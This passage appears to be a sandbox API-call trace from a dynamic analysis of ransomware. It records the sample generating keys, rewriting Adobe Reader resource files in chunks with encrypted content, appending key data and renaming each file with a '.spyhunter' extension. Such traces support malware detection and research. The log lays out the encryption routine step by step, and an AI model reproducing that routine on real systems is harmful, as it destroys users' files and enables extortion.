10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW.txt.spyhunter") returned 121 [0120.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.zh_TW.txt.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.zh_tw.txt.spyhunter")) returned 1 [0120.244] GetProcessHeap () returned 0x2c0000 [0120.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0120.244] GetProcessHeap () returned 0x2c0000 [0120.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0120.244] GetProcessHeap () returned 0x2c0000 [0120.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e89ae0 | out: hHeap=0x2c0000) returned 1 [0120.244] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf918 | out: pbBuffer=0x25cf918) returned 1 [0120.244] GetProcessHeap () returned 0x2c0000 [0120.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0120.244] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf910*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf910*=0x30) returned 1 [0120.244] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\ctl_gb18030.cnv" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\ctl_gb18030.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0120.244] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\ctl_gb18030.cnv") returned 93 [0120.244] StrStrW (lpFirst="ctl_gb18030.cnv", lpSrch=".txt") returned 0x0 [0120.245] GetProcessHeap () returned 0x2c0000 [0120.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0120.245] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf8d4*=0x2800, lpOverlapped=0x0) returned 1 [0120.284] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.284] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf8d4*=0x2800, lpOverlapped=0x0) returned 1 [0120.284] GetProcessHeap () returned 0x2c0000 [0120.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0120.284] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.284] WriteFile (in: hFile=0xec, lpBuffer=0x25cf914*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8d4, lpOverlapped=0x0 | out: lpBuffer=0x25cf914*, lpNumberOfBytesWritten=0x25cf8d4*=0x4, lpOverlapped=0x0) returned 1 [0120.420] WriteFile (in: hFile=0xec, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8d4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8d4*=0x30, lpOverlapped=0x0) returned 1 [0120.420] CloseHandle (hObject=0xec) returned 1 [0120.454] GetProcessHeap () returned 0x2c0000 [0120.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f15cb0 [0120.455] wnsprintfW (in: pszDest=0x2f15cb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\ctl_gb18030.cnv.spyhunter") returned 103 [0120.455] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\ctl_gb18030.cnv" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\ctl_gb18030.cnv"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\ctl_gb18030.cnv.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\ctl_gb18030.cnv.spyhunter")) returned 1 [0120.455] GetProcessHeap () returned 0x2c0000 [0120.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f15cb0 | out: hHeap=0x2c0000) returned 1 [0120.456] GetProcessHeap () returned 0x2c0000 [0120.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0120.456] GetProcessHeap () returned 0x2c0000 [0120.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4e2f0 | out: hHeap=0x2c0000) returned 1 [0120.456] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf910 | out: pbBuffer=0x25cf910) returned 1 [0120.456] GetProcessHeap () returned 0x2c0000 [0120.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0120.456] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf908*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf908*=0x30) returned 1 [0120.457] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0213.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0213.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0120.465] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0213.txt") returned 101 [0120.466] StrStrW (lpFirst="JISX0213.txt", lpSrch=".txt") returned=".txt" [0120.466] lstrlenW (lpString=".txt") returned 4 [0120.466] lstrlenW (lpString=".txt") returned 4 [0120.466] GetProcessHeap () returned 0x2c0000 [0120.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0120.466] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.517] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.517] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.517] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.562] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.563] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.563] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.791] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.791] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.791] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.792] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.792] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.792] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.792] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.792] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.792] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.792] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.793] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.793] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.793] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.793] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.793] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.793] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.793] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.794] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.794] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.794] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.794] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.794] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.794] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.795] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.795] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.795] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.795] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.795] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.795] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.795] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.796] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.796] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.796] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.796] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.796] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.796] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.797] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.797] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.797] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.797] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.797] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.797] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x1ed0, lpOverlapped=0x0) returned 1 [0120.797] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffe130, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.798] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1ed0, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x1ed0, lpOverlapped=0x0) returned 1 [0120.798] GetProcessHeap () returned 0x2c0000 [0120.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0120.798] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.798] WriteFile (in: hFile=0x170, lpBuffer=0x25cf90c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x25cf90c*, lpNumberOfBytesWritten=0x25cf8cc*=0x4, lpOverlapped=0x0) returned 1 [0120.798] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8cc*=0x30, lpOverlapped=0x0) returned 1 [0120.798] CloseHandle (hObject=0x170) returned 1 [0120.798] GetProcessHeap () returned 0x2c0000 [0120.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0120.799] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0213.txt.spyhunter") returned 111 [0120.799] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0213.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0213.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0213.txt.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0213.txt.spyhunter")) returned 1 [0120.799] GetProcessHeap () returned 0x2c0000 [0120.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0120.800] GetProcessHeap () returned 0x2c0000 [0120.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0120.800] GetProcessHeap () returned 0x2c0000 [0120.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee17e8 | out: hHeap=0x2c0000) returned 1 [0120.800] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf910 | out: pbBuffer=0x25cf910) returned 1 [0120.800] GetProcessHeap () returned 0x2c0000 [0120.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0120.800] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf908*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf908*=0x30) returned 1 [0120.800] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP932.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp932.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0120.801] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP932.TXT") returned 96 [0120.801] StrStrW (lpFirst="CP932.TXT", lpSrch=".txt") returned 0x0 [0120.801] GetProcessHeap () returned 0x2c0000 [0120.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0120.801] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.934] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.934] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf8cc*=0x2800, lpOverlapped=0x0) returned 1 [0120.934] GetProcessHeap () returned 0x2c0000 [0120.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0120.935] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.935] WriteFile (in: hFile=0x170, lpBuffer=0x25cf90c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x25cf90c*, lpNumberOfBytesWritten=0x25cf8cc*=0x4, lpOverlapped=0x0) returned 1 [0120.958] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf8cc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf8cc*=0x30, lpOverlapped=0x0) returned 1 [0120.958] CloseHandle (hObject=0x170) returned 1 [0120.958] GetProcessHeap () returned 0x2c0000 [0120.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0120.958] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP932.TXT.spyhunter") returned 106 [0120.958] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP932.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp932.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP932.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp932.txt.spyhunter")) returned 1 [0120.959] GetProcessHeap () returned 0x2c0000 [0120.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0120.959] GetProcessHeap () returned 0x2c0000 [0120.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0120.967] GetProcessHeap () returned 0x2c0000 [0120.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3900 | out: hHeap=0x2c0000) returned 1 [0120.967] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf908 | out: pbBuffer=0x25cf908) returned 1 [0120.967] GetProcessHeap () returned 0x2c0000 [0120.967] RtlAllocateHeap (HeapHandle=0x2c0000, 